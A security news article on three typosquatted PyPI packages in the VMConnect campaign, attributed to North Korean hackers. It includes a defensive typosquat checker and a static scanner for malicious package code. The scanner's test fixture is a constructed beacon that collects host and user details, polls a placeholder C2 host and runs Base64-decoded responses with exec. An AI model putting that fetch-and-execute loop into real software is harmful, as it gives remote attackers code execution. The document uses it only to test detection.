Malicious kimchi: hackers from North Korea hid three unpleasant surprises in the PyPI repository

How the malicious Python packages infect a system and what their developers' goals are.

Three new malicious Python packages have been discovered on the popular PyPI repository. According to researchers, they are part of the VMConnect campaign, which is most likely run by North Korean hackers.

The packages, published under the names tablediter, request-plus, and requestspro, were identified by the security company ReversingLabs.

The VMConnect campaign uses Python packages that mimic popular open-source tools. Once installed, they automatically download additional malware.

The attackers use typosquatting to make the malicious packages look legitimate: they choose names very similar to those of popular libraries, which can confuse developers and helps the packages avoid detection.
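A quick way to catch names like these before they reach a build is to compare every dependency name against a list of popular packages, after PEP 503 normalisation, using a small edit distance and stripping the marketing suffixes ("pro", "plus", "py", ...) that squatters tack on. The checker below is an added example, not code from ReversingLabs or the article; the list of popular names and the suffix list are constructed for illustration and would be replaced by a real top-N download list in practice.

```python
import re

# Constructed stand-in for a "top downloaded packages" list.
POPULAR = ["requests", "numpy", "pandas", "urllib3", "setuptools", "tabulate", "pyyaml"]

# Suffixes/prefixes squatters commonly bolt onto a well-known name (assumed list).
AFFIXES = ("pro", "plus", "py", "lib", "utils", "util", "x", "2", "3")


def normalize(name):
    """PEP 503 name normalisation: lower-case, runs of -_. collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute, cost 1 each)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def squat_candidates(name, popular=POPULAR, max_distance=1):
    """Return [(popular_name, distance), ...] that `name` looks like a squat of.

    A package that *is* a popular name returns nothing; otherwise we compare
    both the raw name and the name with a known affix stripped, so that
    'requestspro' -> 'requests' (distance 0) and 'request-plus' -> 'request'
    (distance 1 from 'requests') are both reported.
    """
    norm = normalize(name)
    if norm in popular:
        return []
    compact = norm.replace("-", "")
    stems = {compact}
    for affix in AFFIXES:
        if compact.endswith(affix) and len(compact) > len(affix) + 2:
            stems.add(compact[: -len(affix)])
        if compact.startswith(affix) and len(compact) > len(affix) + 2:
            stems.add(compact[len(affix):])
    hits = []
    for p in popular:
        best = min(levenshtein(s, p.replace("-", "")) for s in stems)
        if best <= max_distance:
            hits.append((p, best))
    return sorted(hits, key=lambda h: h[1])


if __name__ == "__main__":
    for candidate in ("request-plus", "requestspro", "tablediter", "reqests"):
        print(candidate, "->", squat_candidates(candidate))
```

Run this over `pip freeze` output or a lockfile in CI; a non-empty result is a reason to look at the package's maintainer, upload date and `setup.py` before installing it. The threshold of one edit is deliberately tight to keep false positives low; tablediter, which does not shadow any name in the sample list, is not flagged, which is exactly why name checks need to be paired with behavioural analysis of the package contents.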

One of the packages, tablediter, does not activate its malicious code immediately after installation, so that it is not caught by security tools that only look at what a package does at install time.

The code inside tablediter runs in an infinite loop: it periodically contacts an external server to download Base64-encoded code and execute it. (Base64 is an encoding, not encryption; it hides the payload from simple string matching but provides no confidentiality.) The exact nature of that code is still unknown, which adds a further degree of uncertainty and risk for defenders.

The two other packages, request-plus and requestspro, collect information about the infected computer and transmit it to the command-and-control server.

Once the connection with the command-and-control server is established, the infected system receives a token. It sends the token back, but to a different endpoint on the same server. The response contains an encoded Python module and a download URL.

The researchers assume that the module uses this URL to fetch the next stage of the malware.
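Both behaviours described above, the tablediter beacon loop that executes Base64-decoded code and the request-plus/requestspro host fingerprinting followed by a C2 exchange, leave recognisable shapes in the package source. The static scanner below is an added example (not ReversingLabs' tooling and not the malware's own code) that walks a package file's AST and flags three of those shapes: `exec`/`eval` applied to the result of a decode call, a network call inside a `while True:` loop, and two or more host-identification calls in a file that also makes network calls. The two source fixtures are constructed to illustrate the patterns; the hostname `c2.invalid` is a placeholder.

```python
import ast

# Call names that identify the host (assumed list, extend as needed).
FINGERPRINT_CALLS = {"platform.node", "platform.platform", "platform.machine",
                     "socket.gethostname", "getpass.getuser", "os.getlogin", "uuid.getnode"}
# Call names that talk to the network.
NETWORK_CALLS = {"urllib.request.urlopen", "requests.get", "requests.post",
                 "http.client.HTTPConnection", "socket.socket"}
# Call names that turn a blob back into code/data before execution.
DECODE_CALLS = {"base64.b64decode", "codecs.decode", "zlib.decompress"}


def dotted(node):
    """'a.b.c' for a Name/Attribute chain, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def collect_aliases(tree):
    """Map bound names to fully qualified ones so 'from urllib.request import urlopen'
    and 'import requests as rq' still resolve to the canonical call names."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                bound = a.asname or a.name.split(".")[0]
                aliases[bound] = a.name if a.asname else a.name.split(".")[0]
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def resolve(func, aliases):
    name = dotted(func)
    if name is None:
        return None
    head, _, rest = name.partition(".")
    head = aliases.get(head, head)
    return head + ("." + rest if rest else "")


def is_infinite_loop(node):
    return isinstance(node, ast.While) and isinstance(node.test, ast.Constant) and bool(node.test.value)


def scan_source(src):
    """Return sorted [(finding_kind, lineno), ...] for one Python source file."""
    tree = ast.parse(src)
    aliases = collect_aliases(tree)
    findings, fingerprints, network_lines = [], set(), []

    def calls_in(subtree, names):
        return any(isinstance(n, ast.Call) and resolve(n.func, aliases) in names
                   for n in ast.walk(subtree))

    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = resolve(node.func, aliases)
            if name in FINGERPRINT_CALLS:
                fingerprints.add(name)
            if name in NETWORK_CALLS:
                network_lines.append(node.lineno)
            # exec(base64.b64decode(...)): code arrives as data and is run directly.
            if isinstance(node.func, ast.Name) and node.func.id in ("exec", "eval"):
                if any(calls_in(arg, DECODE_CALLS) for arg in node.args):
                    findings.append(("exec-decoded", node.lineno))
        elif is_infinite_loop(node) and calls_in(node, NETWORK_CALLS):
            # Polling a remote server forever is the beacon shape, not library code.
            findings.append(("beacon-loop", node.lineno))
    if len(fingerprints) >= 2 and network_lines:
        findings.append(("fingerprint-exfil", min(network_lines)))
    return sorted(findings, key=lambda f: f[1])


# Constructed fixture shaped like the behaviour described in the article.
SAMPLE_BEACON = '''
import base64, time, platform, getpass
from urllib.request import urlopen

def _collect():
    return {"host": platform.node(), "user": getpass.getuser()}

def _run():
    while True:
        try:
            resp = urlopen("http://c2.invalid/check")  # placeholder C2, constructed
            exec(base64.b64decode(resp.read()))
        except Exception:
            pass
        time.sleep(3600)
'''

# Constructed benign fixture: decodes data and talks to the network, but never runs it.
SAMPLE_BENIGN = '''
import base64
import requests

def fetch(url):
    r = requests.get(url, timeout=5)
    return base64.b64decode(r.json()["data"])
'''

if __name__ == "__main__":
    print("beacon:", scan_source(SAMPLE_BEACON))
    print("benign:", scan_source(SAMPLE_BENIGN))
```

Point `scan_source` at every `.py` file in an unpacked sdist or wheel (including `setup.py`, which is where install-time behaviour lives) rather than at the import-time path alone; the tablediter case shows why a package that looks idle at install can still be carrying a beacon. Each rule is a heuristic and can be defeated by obfuscation, so treat a hit as a reason for manual review, and a clean result as nothing more than the absence of the obvious.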

The scenarios of the current attacks and of other known incidents, such as the attack on JumpCloud and the npm campaign, are suspiciously similar, which supports the theory that North Korean hackers are behind them. Interestingly, in other operations the attackers pursued financial gain and mainly targeted cryptocurrency platforms.

Similar attacks have been found targeting macOS and Linux. This is just the latest in a series of attacks on users of the PyPI repository, and a reminder that security teams should stay on their guard.